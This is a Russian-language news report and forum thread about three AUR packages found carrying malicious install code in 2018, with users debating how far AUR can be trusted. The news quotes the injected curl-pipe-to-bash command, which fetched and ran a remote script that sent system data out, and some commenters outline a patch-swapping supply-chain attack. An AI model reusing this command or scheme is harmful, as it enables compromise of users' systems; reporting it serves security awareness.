The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"В AUR-репозитории Arch Linux найдено вредоносное ПО"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от opennews (??), 11-Июл-18, 10:22 
В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/...) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах
acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и  minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых
в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...) код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта  "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через вызов по таймеру в systemd (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей. Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. Проблема была выявлена в течение несколько часов после модификации пакетов. Изменение было сразу отклонено,  а учётная запись  разработчика xeactor заблокирована. Пользователям 7 июля устанавливавшим обновления вышеотмеченных пакетов рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

URL: https://sensorstechforum.com/arch-linux-aur-repository-found.../
Новость: https://www.opennet.dev/opennews/art.shtml?num=48948

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –13 +/
Сообщение от Аноним (1), 11-Июл-18, 10:22 
>учётная запись разработчика xeactor заблокирована

Как-то нетолерантно.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

127. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Fantomas (??), 12-Июл-18, 17:21 
Уууууу, толераст
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –12 +/
Сообщение от Michael Shigorinemail (ok), 11-Июл-18, 10:24 
По сути от'whitehat'ил...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +26 +/
Сообщение от Atterratio (ok), 11-Июл-18, 10:45 
А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

20. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –17 +/
Сообщение от Michael Shigorinemail (ok), 11-Июл-18, 11:32 
Это было удивление тем, что заблокировали вместо того, чтоб сказать спасибо за науку.
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

28. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +12 +/
Сообщение от Аноним (28), 11-Июл-18, 12:22 
За какую науку? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

103. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Джон Ленин (?), 12-Июл-18, 00:13 
AUR полностью аналогичен PPA, и цели для которых он предназначен конвертация чужих пакетов и git clone со сборкой всяких патченых мез и вайнов.

Просто нефиг из аура собирать системные компоненты и ставить осиротелый софт. Плюс к тому, никто тебя и не принуждает пользоваться всякими PPA/AURами.

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

23. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +8 +/
Сообщение от Аноним (23), 11-Июл-18, 11:49 
> А что отвайхетил то? Все и так знали, что AUR это помойка, в которую любой мог загрузить что угодно.

"Я не я, и лошадь не моя!" - это в таких вот новостях.
А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУР:
https://repology.org/statistics/total
;)


Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

56. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (56), 11-Июл-18, 15:49 
в связи с этим случаем я даже видел заявление, что AUR (Arch User Repository) никакого отношения к арчу не имеет
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

79. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –2 +/
Сообщение от soarin (ok), 11-Июл-18, 19:40 
Фанатики, сэр.
Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

104. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним (104), 12-Июл-18, 00:14 
>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то любят ходить гоголями и гордо кивать на АУР

Объясняю для танкистов.
Момент первый. В АУРе примерно 25-40% поддерживаемых сборочных скриптов (PKGBUILD). С помощью этих скриптов с пол пинка создаётся пакет, который потом под контролем пакетного менеджера (а не бардак, как у адептов configure && make && make install). Сюда же стоит отметить простоту синтаксиса, и как следствие простоту поддержки PKGBUILD в актуальном состоянии. Именно поэтому они кивают на АУР.
Момент второй. АУР во многих аспектах создан по гугловому принципу "Don't be evil", который сейчас и нарушили - загрузили скрипт подтягивающий дрянь. Да в текущем виде подобных атак можно провести вагон и тележку - в постинстальные скрипты добавить патч Бармина, например. Отсюда и всякие "Any use of the provided files is at your own risk", который болдом висит на главной странице АУРа, отсюда и манёвры с Trusted Users, отсюда и голосовалка, чтобы откровенная дрянь или мало кому нужная херня не попала в community.
Момент третий. И, на мой взгляд, самый важный. В стародавние времена, люди сами просматривали PKGBUILD перед тем, как собрать его с помощью makepkg. Сейчас, с появление автоматизаторок, и в особенности yaourt, который во многих в скользких ситуациях, предлагает решения в стиле "пох*й - пляшем", этап рецензирования просто выпал.
Вот и всё - нагибание принципа "Don't be evil" и отсутствие минимальной гигиены привело к таким печальным результатам.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

111. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Аноним (23), 12-Июл-18, 03:12 
> С помощью этих скриптов с пол пинка создаётся пакет, который потом под контролем пакетного менеджера (а не бардак, как у адептов configure && make && make install)

checkinstall? Не, не слышали!

> Да в текущем виде подобных атак можно провести вагон и тележку -
> в постинстальные скрипты добавить патч Бармина, например. Отсюда и всякие "Any
> use of the provided files is at your own risk", который
> болдом висит на главной странице АУРа, отсюда и манёвры с Trusted
> Users, отсюда и голосовалка, чтобы откровенная дрянь или мало кому нужная
> херня не попала в community.

Отсюда и полная неуместность сравнения с нормальными репами того же дебиана, о чем собственно и речь.


Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

105. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Джон Ленин (?), 12-Июл-18, 00:19 
То, что скрипт сборки умеет лазить в репозитории дебианов и федор, тягать оттуда их пакеты и конвертить в свои, это конечно фатальный недостаток, да.

И то, что он из git умеет собирать бинарный пакет, - это тоже страхъ, да.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

112. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от лютый охохоня... (?), 12-Июл-18, 05:03 
>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то

Вапщта в Арче пакетов много даже БЕЗ aur.

Плюс, в целом ситуация - когда обнаружили подставу всего через 7 часов показывает высокий уровень подготовки Арчеводов. :D Ты лучше убунтуям в PPA троян положи и посмотрим сколько лет он там пролежит незамеченным.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

120. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (23), 12-Июл-18, 12:10 
>>А вот когда речь идет о количестве софта в репе, то арчеводы почему-то
> Вапщта в Арче пакетов много даже БЕЗ aur.

Вапщта нет. И количество пакетов != количество софта.


Ответить | Правка | ^ к родителю #112 | Наверх | Cообщить модератору

132. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (132), 13-Июл-18, 14:55 
Ага. Да и количество пакетов - не самый важный показатель.
Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

57. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –2 +/
Сообщение от Аноним (56), 11-Июл-18, 15:54 
от'redhat'ил
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

102. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (102), 11-Июл-18, 22:34 
Аргументируй
Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

77. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от crypt (ok), 11-Июл-18, 18:57 
> По сути от'whitehat'ил...

да, но скорее тестировали, как пройдет.


Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (3), 11-Июл-18, 10:35 
Отсюда вывод: никаких бинарных пакетов от людей не являющихся официальными разработчиками дистрибутива. Нужно что-то, чего нет в официальном репозитории, собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проекта.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +10 +/
Сообщение от Atterratio (ok), 11-Июл-18, 10:42 
Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

11. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –8 +/
Сообщение от Celcion (ok), 11-Июл-18, 10:52 
> Мда... Я смотрю кто то не знает что такое AUR...

И этот кто-то - ты.

> Там нет этих ваших бинарных пакетов как в Ubuntu PPA

Серьезно? А "-bin" пакеты - это что?
https://aur.archlinux.org/packages/?O=0&K=-bin

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

13. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +4 +/
Сообщение от Аноним (13), 11-Июл-18, 11:01 
> Серьезно? А "-bin" пакеты - это что?

А где лежат сами пакеты без подсказки догадаетесь?

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

15. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –8 +/
Сообщение от Celcion (ok), 11-Июл-18, 11:02 
>> Серьезно? А "-bin" пакеты - это что?
> А где лежат сами пакеты без подсказки догадаетесь?

Можно раскрыть мысль - а как это отменяет факт, что бинарные пакеты в AUR таки есть, о чем и было сказано?

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

36. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +3 +/
Сообщение от Аноним (36), 11-Июл-18, 13:17 
В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

70. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –5 +/
Сообщение от Celcion (ok), 11-Июл-18, 17:35 
> В аур есть бинарные пакеты, а аур нету самих бинарников. Нельзя там бинарники хостить, блин. Что-за недалёкий народ, не знают сути вопроса но спорить лезут не по делу.

Действительно, такие как ты очень любят настойчиво не понимать, с чем идет спор и настаивать на чем-то, с чем никто не спорил.
Предыдущий оратор говорил, что в AUR все собирается из исходников и нет бинарей и спор был именно с этим. Я не утверждал, что бинари лежат прямо в AUR. Но тебе ведь наплевать. Тебе поспорить надо.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

107. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Александрemail (??), 12-Июл-18, 01:06 
Спор какой-то не в тему. Впадлу что ли PKGBILD глянуть на предмет, от куда бинари дёргаются.
Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

118. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от Celcion (ok), 12-Июл-18, 09:36 
> Спор какой-то не в тему. Впадлу что ли PKGBILD глянуть на предмет, от куда бинари дёргаются.

А "впaдлу" включить голову и попытаться понять, что речь идет не об этом? Или тут все уже начинают включать режим одеревенения?

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

137. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от чебурнет.рф (ok), 15-Июл-18, 05:27 
Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.
Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

139. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Celcion (ok), 16-Июл-18, 10:16 
> Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.

Остаться правым можно в случае, если был какой-то спор. А когда ты говоришь про Фому, а тебе упорно в ответ талдычат про Ерёму - это не спор, а просто тупoсть. Но многих здесь это, видимо, устраивает.

Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

92. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –2 +/
Сообщение от Аноним (92), 11-Июл-18, 20:37 
Так это ещё хуже, чем если бы они там были. Тупо в любой момент можно бинарник подменить.
Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

44. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от анонимус (??), 11-Июл-18, 14:14 
Серьезно что ли?
Откройте PKGBUILD, не поленитесь. Там в строчке source указано, где лежит бинарь
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

133. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Джон Ленин (?), 14-Июл-18, 01:27 
...и к нему контрольная сумма прилагается.

Так например проприетарный торрент-клиент Tixati качается с официального сайта и конвертируется в родной пакет.

...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.

Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

140. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Celcion (ok), 16-Июл-18, 10:24 
> ...и к нему контрольная сумма прилагается.
> ...если контрольная сумма не совпадает (программа подменена или обновлена) — сборка и установка пакета не происходит.

Верно. Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом самом внешнем сайте, даже если он проходит валидацию - не запихали в одном из релизов вошек? Какой-то неизвестный Вася, собиравший PGKBUILD, тебе за это поручится?
Понятно, что это не будет проблемой AUR-а как таковой, но сам по себе AUR никто и не обвинял. Вопрос в том, что установка бинарных пакетов - есть. Со всеми из этого вытекающими потенциальными проблемами. Какой смысл с этим спорить, дескать, "а бинари не на самом AUR-е лежат!" - я фиг знает.

Ответить | Правка | ^ к родителю #133 | Наверх | Cообщить модератору

16. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +9 +/
Сообщение от Амнон (?), 11-Июл-18, 11:05 
> Серьезно? А "-bin" пакеты - это что?

Тебе ещё раз повторяют: в самом AUR'е не содержится никаких пакетов, тем более бинарных. AUR - это сборник PKGBUILD'ов, скриптов сборки пакетов. Но в AUR'е присутствуют скрипты для установки бинарников, это да.

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

30. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от виндотролль (ok), 11-Июл-18, 12:25 
В аур, думаю, можно коммитнуть бинарник (головой не ручаюсь, может быть у них там какие-то хуки стоят на пуш, а пробовать не приходилось) и добавить его в sources
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

53. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Арчевод (?), 11-Июл-18, 15:32 
Нельзя
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

55. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –2 +/
Сообщение от виндотролль (ok), 11-Июл-18, 15:47 
Почему?
Точно можно всякие .desktop коммитить. И кажется, где-то даже видел .xpm в сорцах, что есть бинарник.
Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

93. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Dmitry Shachnev (ok), 11-Июл-18, 20:37 
И .desktop, и .xpm — это текстовые форматы.
Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

106. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от виндотролль (ok), 12-Июл-18, 00:50 
Так а все таки, что помешает? Запушить не позволят?

Не хочу заняться аур тестовым пакетом чтоб только проверить

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

72. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –3 +/
Сообщение от Celcion (ok), 11-Июл-18, 17:36 
> Но в AUR'е присутствуют скрипты для установки бинарников, это да.

Именно про это и говорилось, и ничего не говорилось про то, где бинарные пакеты расположены. Но зачем включать голову, напрягать зрение чтением, когда желание поспорить на пустом месте уже сформировалось, правда?

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

87. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от axredneck (?), 11-Июл-18, 20:17 
Ну да, они есть. Но достаточно скачать такой PKGBUILD и глянуть в нем, откуда качается бинарь, чтобы понять, стоит это ставить или нет.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

33. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –6 +/
Сообщение от Vitaliy Blatsemail (?), 11-Июл-18, 12:29 
> Мда... Я смотрю кто то не знает что такое AUR... Там нет этих ваших бинарных пакетов как в Ubuntu PPA, там только простые(за все не поручусь но офф документация рекомендует обходиться буквально в несколько строк) скрипты для сборки того или иного пакета из исходников.

Наркоманштoле ? Каким образом ты думаешь устанавливается софт по типу вайбера ?
Нее, с официального сайта качается deb-файл, оттуда вытягивается бинарник и ставится согласно окружению.

Прости что разрушил твой уютный мирок.

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

39. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от админ локалхоста (?), 11-Июл-18, 14:01 
вот только в AUR-е от этого бинарников не появилось
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

54. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от Vitaliy Blatsemail (?), 11-Июл-18, 15:34 
> вот только в AUR-е от этого бинарников не появилось

Это каким-то образом отменяет установку бинарника ?

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

108. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Александрemail (??), 12-Июл-18, 01:19 
С каких пор установка бинарей с оф. сайтов стала трагедией?
Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

5. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от rand (?), 11-Июл-18, 10:45 
Этот вывод не отсюда. В данном случае хватило бы просто прочесть скрипт сборки.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

8. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от виндотролль (ok), 11-Июл-18, 10:45 
> собирайте пакет сами из исходников, скачанных с официального сайта соответствующего проекта

AUR это и делает. Выкачать PKGBUILD из AUR и проверить 20-строчный скрипт на предмет закладок гораздо проще, чем этот самый скрипт написать.

AUR FTW, ArchLinux one love, ну и там всякое такое...

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

27. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от Аноним (27), 11-Июл-18, 12:19 
О да, для каждого пакета просматривать скрипт установки то еще удовольствие.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

35. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +5 +/
Сообщение от Shatur (ok), 11-Июл-18, 12:59 
Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый скрипт сборки.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

59. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от J.L. (?), 11-Июл-18, 16:15 
> Ну да, проще каждый раз свой велосипед городить, чем посмотреть на готовый
> скрипт сборки.

кстати а при обновлении из AURа пакетный манагер обновляет или говорит что низя и надо смотреть?

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

62. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от Аноним (62), 11-Июл-18, 16:41 
Смотря какой манагер. yaourt обновляет, но отдельно от бинарных реп, и предлагает каждый pkgbuild посмотреть.
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

86. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от axredneck (?), 11-Июл-18, 20:13 
Более того, он может обновлять через git и предлагать проверить не весь PKGBUILD, а только изменения в нем.
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

100. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от ы (?), 11-Июл-18, 21:26 
на всякий случай про текущую ситуацию с yaourt: https://www.reddit.com/r/archlinux/comments/8wp9ep/psa_that_.../
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

129. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от UzerBluzer (?), 12-Июл-18, 21:04 
Сейчас в моде aurman. Держу в курсе.
Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

64. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от анан (?), 11-Июл-18, 16:43 
при каждой установке  или обновлении пакета предлагает посмотреть
Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

75. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от J.L. (?), 11-Июл-18, 18:21 
> при каждой установке  или обновлении пакета предлагает посмотреть

а много можно понять по такому билдскрипту?
https://www.opennet.dev/openforum/vsluhforumID3/114809.html#48

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

109. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Александрemail (??), 12-Июл-18, 01:23 
Увы, но что-то я там не увидел билдскрипта.
Ответить | Правка | ^ к родителю #75 | Наверх | Cообщить модератору

122. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от J.L. (?), 12-Июл-18, 12:50 
> Увы, но что-то я там не увидел билдскрипта.

а что же там? "Kусок из PKGBUILD chromium-dev"

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

7. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  –1 +/
Сообщение от odityemail (ok), 11-Июл-18, 10:45 
В скрипте не видно,что он создает в usr/lib/systemd/system что-то
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от SysA (?), 11-Июл-18, 10:50 
Как это?!..
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

126. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от Аноним (126), 12-Июл-18, 17:20 
/usr/lib/systemd/systemd.so ? :-)
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

9. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним (-), 11-Июл-18, 10:47 
ну, учитывая что в аур даже варез заливают, заголовок желтоват. "Доверяй, но проверяй"
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от виндотролль (ok), 11-Июл-18, 10:53 
мне видится 1 потенциально удачный сценарий атаки на AUR — сделать вредоносный патч на сишечке, а лучше перле к какому-нибудь сложному софту (чтоб нелегко было разобраться) с аргументацией, что патч что-то улучшает (Arch позволяет делать патчи частью пакета). Лучше если будет много патчей, да чтоб часть из них правда делала что-то полезное, а без некоторых сборка на арче была невозможна.

Тогда — высока вероятность, что вредоносный патч заметят очень не сразу.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от emaNameemail (?), 11-Июл-18, 11:09 
И что это за мегапопулярный пакет будет, что кто-то будет этим заморачиваться?
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

22. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +2 +/
Сообщение от Аноним (22), 11-Июл-18, 11:44 
Навскидку - гуглохром подойдёт. Особенно пикантно, если патчи будут чистить гуглозонды. Параноики же должны страдать, правда?
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

24. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от emaNameemail (?), 11-Июл-18, 11:49 
Вряд ли к таким пакетам проходимец какой-нибудь дорвется.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

32. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от nrv (ok), 11-Июл-18, 12:26 
К основному Хрому да.
А к какой-нибудь патченной в ауре, которая типа буз гуглозондов (вообще, есть хромиум, но, с другой стороны, хром не только зондами отличется, но это так, лирика).
Концепция видится мне рабочей, не обяхательно хром, пример не слишком удачный.
Но много народу не заразить таким образом, наверное.
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

25. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от emaNameemail (?), 11-Июл-18, 11:51 
Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.
Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

48. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +3 +/
Сообщение от Аноним84701 (ok), 11-Июл-18, 14:43 
> Куча народа мониторят изменения в PKGBUILD в таких популярных пакетах.

Вопрос в том, мониторят ли так же и все сторонние патчи?
Kусок из PKGBUILD chromium-dev:


source=( #"https://gsdview.appspot.com/chromium-browser-official/chromium-${pkgver}.tar.xz"
        "https://commondatastorage.googleapis.com/chromium-browser-of...-${pkgver}.tar.xz"
        'git+https://github.com/foutrelis/chromium-launcher.git'
        'chromium-dev.svg'
        # Patch form Gentoo
        'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
        'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
        'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
        'https://raw.githubusercontent.com/gentoo/gentoo/master/www-c...'
         # Misc Patches
        'chromium-ffmpeg-clang.patch'
        'chromium-intel-vaapi_r18.diff.base64::https://chromium-review.googlesource.com/changes/532294/revi...'
        # Patch from crbug (chromium bugtracker) or Arch chromium package
        'chromium-widevine-r2.patch::https://git.archlinux.org/svntogit/packages.git/plain/trunk/...'
        'chromium-skia-harmony.patch::https://git.archlinux.org/svntogit/packages.git/plain/trunk/...'
        'fix_mixup_between_DIP_pixel_coordinates.diff.base64::https://chromium-review.googlesource.com/changes/1083692/rev...'
        )

Т.е, если развить идею - делаем работающий патч для вырезания очередного зонда или сомнительного действа.
Прилежно сопровождаем пару месяцев, предлагаем для включения.
...
Через тройку месяцев подменяем.
...
Профит!?

Немного утрированно, но кроме популярных хрумов наверняка наберется дюжина-другая "малонужных" (и поэтому слабомониторящихся) проектов, с неплохой суммарной пользовательской базой.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

65. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +1 +/
Сообщение от анан (?), 11-Июл-18, 16:46 
там у каждого файла по рекомендациям должна быть хеш, если изменить файлы то хеш не сойдется, но в принципе я думаю никто не следит за тем что хеши обновляются
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

76. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от виндотролль (ok), 11-Июл-18, 18:33 
> там у каждого файла по рекомендациям должна быть хеш, если изменить файлы
> то хеш не сойдется, но в принципе я думаю никто не
> следит за тем что хеши обновляются

блин, это ж естественно, что хеши обновляются. Код меняется, патчи адаптируются под новый код.
Тут все только не доверии. Кажется, кстати, можно пакеты в AUR подписывать gpg ключом (не уверен, но вроде бы встречалось такое).

Ответить | Правка | ^ к родителю #65 | Наверх | Cообщить модератору

80. "В AUR-репозитории Arch Linux найдено вредоносное ПО"  +/
Сообщение от пох (?), 11-Июл-18, 19:42 
> Кажется, кстати, можно пакеты в AUR подписывать gpg ключом

а смыл-то в чем? Вот подпишу я тебе своим ключом пакет, создающий у тебя в хомяке pwned.txt - у меня тех ключей - целая ключница. И чо?

